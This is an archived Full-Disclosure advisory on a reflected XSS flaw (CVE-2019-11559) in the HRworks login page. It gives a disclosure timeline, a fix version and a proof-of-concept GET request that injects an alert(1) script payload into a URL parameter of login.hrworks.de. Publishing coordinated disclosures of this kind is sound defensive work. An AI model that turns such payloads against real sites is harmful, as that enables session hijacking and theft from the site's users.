lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 18 Sep 2019 09:51:06 +0000
From: Georg Ph E Heise via Fulldisclosure <fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] Reflected XSS – HRworks Login (v1.16.1)

# Exploit Title:  Reflected XSS – HRworks Login (v1.16.1)

# Vendor Homepage: https://www.hrworks.de

# Exploit Author: Georg Philipp Erasmus Heise / Lufthansa Industry Solutions

# Contact: https://twitter.com/gpheheise

# Website: https://www.lufthansa-industry-solutions.com

# Category: webapps

# CVE: CVE-2019-11559

Timeline

26.04.2019 Disclosure to Vendor

29.04.2019 Vendor informed that the issue was remediated

17.09.2019 Publication

1. Description:

The URL parameter of the login page accepts unfiltered parameters that lead to several version of reflected XSS

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11559

2. Proof of Concept:

Vulnerable Source

http://login.hrworks.de

PoC

GET /?re44h"-alert(1)-"bb8rf=1 HTTP/1.1

Host: login.hrworks.de

Accept-Encoding: gzip, deflate

Accept: */*

3. Solution:

As date of publication all versions above 1.16.3 are save to use

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists